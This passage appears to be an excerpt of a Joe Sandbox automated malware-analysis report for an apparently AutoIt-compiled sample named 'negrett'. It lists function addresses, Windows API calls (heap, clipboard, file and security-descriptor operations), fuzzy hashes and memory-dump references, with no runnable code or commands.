Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: ed3cf725221b92780c31c7abc6162e647d481df8396b1290cc78d9ef3d290f56
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 11012B76204B055BE3318F599881A5AFBE9FB85370F65055DE18483381E6306A05C674

Uniqueness

Uniqueness Score: -1.00%

Function 00B3E469 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 00B3E4BE

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction ID: 87a9183e00852ba5bdfc2ccf6e2bab89fead0c263ee6b18e7f5f661870cadb08
Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction Fuzzy Hash: 7101B571910308AFEB24DFA4CC457AE77E8EB44325F6085AAF41597240D631EE00D760

Uniqueness

Uniqueness Score: -1.00%

Function 00B3E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: d0085e16f86f4a9f690bb82a997f1b12aad4cd0c5faff570af9fd752e3dced5a
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: CBF02832510A14A7DB313A6A9C06B5B33D8DF52335F3007EAF830932D2CB70D90596A6

Uniqueness

Uniqueness Score: -1.00%

Function 00B44C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00B11129,00000000,?,00B42E29,00000001,00000364,?,?,?,00B3F2DE,00B43863,00BE1444,?,00B2FDF5,?), ref: 00B44CBE

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 58201c557a1cde6b34091fb69f954c7a02335ba4413bec0a507f6f17631d96d8
Instruction ID: 330e58c588944f77c1f2438e9b213c9de066b37258a220867e4a5c3524d1efaa
Opcode Fuzzy Hash: 58201c557a1cde6b34091fb69f954c7a02335ba4413bec0a507f6f17631d96d8
Instruction Fuzzy Hash: 34F0E931602224A7DB215F62AC85B5B37C8FF417A1F2C4191BC19AB182CF70DA2466E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B43820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00BE1444,?,00B2FDF5,?,?,00B1A976,00000010,00BE1440,00B113FC,?,00B113C6,?,00B11129), ref: 00B43852

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 873e1073dd439b53423e6d98fe998d39407a77139d93db2bca0296783c12f3ea
Instruction ID: 9f85a92792ef5fab58bf51c09117c5beb18fcaf293d5b5ff50142628f293905a
Opcode Fuzzy Hash: 873e1073dd439b53423e6d98fe998d39407a77139d93db2bca0296783c12f3ea
Instruction Fuzzy Hash: BBE0E531100224A6D62126679C01B9BB7C9EB42FB0F2D00A0BC1596480EB21EF01A7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B14F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14F6D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 24764a89bc0703f9f1dbb99d13bc27d95e1be168072114bd8f86bff55ed81eed
Instruction ID: 86a3ac5cd2b088c97943dede614df0c388151c4c7864d8c86620d18b714769e8
Opcode Fuzzy Hash: 24764a89bc0703f9f1dbb99d13bc27d95e1be168072114bd8f86bff55ed81eed
Instruction Fuzzy Hash: 6CF03971105752CFDB349F64D4908A6BBE4EF1632936489BEE1EE87621CB319889DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00B12DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00B12DC4

Part of subcall function 00B16B57: _wcslen.LIBCMT ref: 00B16B6A

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 7808a2c2a165df0dcade1ba79e7e98f7c2bc896f84d2b620b236946e9e145096
Instruction ID: a360881c5e9c49d1dba281189215fddf5558c1ae744a967bf764c7a959faabc8
Opcode Fuzzy Hash: 7808a2c2a165df0dcade1ba79e7e98f7c2bc896f84d2b620b236946e9e145096
Instruction Fuzzy Hash: 1CE0C272A042246BCB20A6989C06FEA77EDDFC9790F0500F1FD09E7248DA60AD848690

Uniqueness

Uniqueness Score: -1.00%

Function 00B12B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B13837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B13908

Part of subcall function 00B1D730: GetInputState.USER32 ref: 00B1D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00B12B6B

Part of subcall function 00B130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B1314E

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 475b1d7151585cce592c95d9e60395e7fea369d353a08976590081ec1317b957
Instruction ID: 64f23f353806beece9baa7f5d256696f33c58090989e85863395a8b495cf0079
Opcode Fuzzy Hash: 475b1d7151585cce592c95d9e60395e7fea369d353a08976590081ec1317b957
Instruction Fuzzy Hash: 7AE0263230428403CA04BB34A8525EDA7E98BD2751FC008BEF142472A2DF308AC94352

Uniqueness

Uniqueness Score: -1.00%

Function 00B82693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B826B5

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 9a74a63760b3071453009c122bba50b14b77d5bbf94271658f26a0605d7c01b9
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: D4E048B06097005FDF396B28A8517B677D4DF49300F10045EF59B82352E5726845C74D

Uniqueness

Uniqueness Score: -1.00%

Function 00B5039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00B50704,?,?,00000000), ref: 00B503B7

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4d68ea08e7e9a6f430d006e30a4eb54f7bfa8090549a82c861356761487fae84
Instruction ID: fb39ff182764dc992a135ba41d3535183afc4880cc1dfee8ef5bbe50aee127e7
Opcode Fuzzy Hash: 4d68ea08e7e9a6f430d006e30a4eb54f7bfa8090549a82c861356761487fae84
Instruction Fuzzy Hash: 84D06C3214010DBBDF028F84DD06EDA3FAAFB48714F014000BE1866020CB36E821AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B11CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00B11CBC

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 626b7d3a31b3cf725f5f9890818980f47c2067fd7340d31c08b7e44374030059
Instruction ID: 85342e30631cbeb52f579b27d3be0c33573d880fa1314ab6c9e5fa4766f7ea96
Opcode Fuzzy Hash: 626b7d3a31b3cf725f5f9890818980f47c2067fd7340d31c08b7e44374030059
Instruction Fuzzy Hash: 28C09B35280344AFF2144784BD8BF107794A358B00F544401F6095F5E3CFB11810D654

Uniqueness

Uniqueness Score: -1.00%

Function 00B8744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00B15745: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B15773

GetLastError.KERNEL32(00000002,00000000), ref: 00B876DE

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: aa2b507a15e896384b42de0dfb9da57c7dba6fc581fda4d5e5752f5ab2bb5809
Instruction ID: edea1b2d8c6d0482709453f1adb3e27d47cbd82d915f5b923cdbdff01b67d1e0
Opcode Fuzzy Hash: aa2b507a15e896384b42de0dfb9da57c7dba6fc581fda4d5e5752f5ab2bb5809
Instruction Fuzzy Hash: 3681C1302487019FC714EF28C491AA9B7E1FF89354F5445ADF89A5B3A2DB30ED85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B2FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00B2FD1F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 14a397e359e51d7ac33f0b6587d1d0520e26e1c75697675155aa104a7bdf912a
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9B31CE75A0011A9BD718CF59E490A69FBF6FB89340B2486F5E80ACB656D731EDC1CBC0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00BA4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00BA48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00BA4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00BA4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00BA494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00BA495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00BA497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00BA49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00BA49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00BA4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00BA4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00BA4A7E
IsMenu.USER32(?), ref: 00BA4A97
GetMenuItemInfoW.USER32 ref: 00BA4AF2
GetMenuItemInfoW.USER32 ref: 00BA4B20
GetWindowLongW.USER32(?,000000F0), ref: 00BA4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00BA4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00BA4C82
wsprintfW.USER32 ref: 00BA4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BA4CC9
GetWindowTextW.USER32 ref: 00BA4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BA4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BA4D33
GetWindowTextW.USER32 ref: 00BA4D5A

Strings

%d/%02d/%02d, xrefs: 00BA4CA8

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: cadaacac90a95f920e2810971acd8b10f4b86389f8bbd70800708ac53c5543bc
Instruction ID: 555e396a44d5f0b654b94c1d631423b172b02b3d3ae9f59038f9f1c90e13c875
Opcode Fuzzy Hash: cadaacac90a95f920e2810971acd8b10f4b86389f8bbd70800708ac53c5543bc
Instruction Fuzzy Hash: 86120471604214AFEB259F28DC49FAE7BF8EF86710F1041A9F51AEB1E1DBB49940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B70B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B71114
Part of subcall function 00B710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B71120
Part of subcall function 00B710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B7112F
Part of subcall function 00B710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B71136
Part of subcall function 00B710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B7114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B70BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B70C00
GetLengthSid.ADVAPI32(?), ref: 00B70C17
GetAce.ADVAPI32(?,00000000,?), ref: 00B70C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B70C6D
GetLengthSid.ADVAPI32(?), ref: 00B70C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B70C8C
HeapAlloc.KERNEL32(00000000), ref: 00B70C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B70CB4
CopySid.ADVAPI32(00000000), ref: 00B70CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B70CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B70D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B70D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70D45
HeapFree.KERNEL32(00000000), ref: 00B70D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70D55
HeapFree.KERNEL32(00000000), ref: 00B70D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70D65
HeapFree.KERNEL32(00000000), ref: 00B70D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00B70D78
HeapFree.KERNEL32(00000000), ref: 00B70D7F

Part of subcall function 00B71193: GetProcessHeap.KERNEL32(00000008,00B70BB1,?,00000000,?,00B70BB1,?), ref: 00B711A1
Part of subcall function 00B71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B70BB1,?), ref: 00B711A8
Part of subcall function 00B71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B70BB1,?), ref: 00B711B7

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: ec71936d6a4dc7e5c45aec0cc93756efbc94bd5ee809d37d79ede67bcfab9ea2
Instruction ID: 89f89e6ec36b6f6ecfecffd227a1539f258deb008ae2d81a968ccae7783bde52
Opcode Fuzzy Hash: ec71936d6a4dc7e5c45aec0cc93756efbc94bd5ee809d37d79ede67bcfab9ea2
Instruction Fuzzy Hash: 4871427190020AEBDF20DFA4DC45FAEBBB8FF05310F1485A5F919A7291DB71A905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B8EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00BACC08), ref: 00B8EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 00B8EB37
GetClipboardData.USER32 ref: 00B8EB43
CloseClipboard.USER32 ref: 00B8EB4F
GlobalLock.KERNEL32 ref: 00B8EB87
CloseClipboard.USER32 ref: 00B8EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B8EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 00B8EBC9
GetClipboardData.USER32 ref: 00B8EBD1
GlobalLock.KERNEL32 ref: 00B8EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 00B8EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 00B8EC38
GetClipboardData.USER32 ref: 00B8EC44
GlobalLock.KERNEL32 ref: 00B8EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B8EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B8EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B8ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 00B8ECF3
CountClipboardFormats.USER32 ref: 00B8ED14
CloseClipboard.USER32 ref: 00B8ED59

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: d72c9ae99ac0a6b694c1d83f3220703887fa52c51b48614699d50b6256372ff2
Instruction ID: b7fa5bd423dd66c0876eb92446d53a344fdd8625b44a0be153b6d3140a1a4560
Opcode Fuzzy Hash: d72c9ae99ac0a6b694c1d83f3220703887fa52c51b48614699d50b6256372ff2
Instruction Fuzzy Hash: AC61DD34204301AFD300EF24D885F6ABBE4EF85754F584599F466972A2DF30E949CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B8698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B869BE
FindClose.KERNEL32(00000000), ref: 00B86A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B86A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B86A75

Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00B86AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B86ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00B86B6A
%4d, xrefs: 00B86BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00B86B32
%03d, xrefs: 00B86DA2
%02d, xrefs: 00B86C00, 00B86C0A, 00B86C5A, 00B86CAA, 00B86CFA, 00B86D4A

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

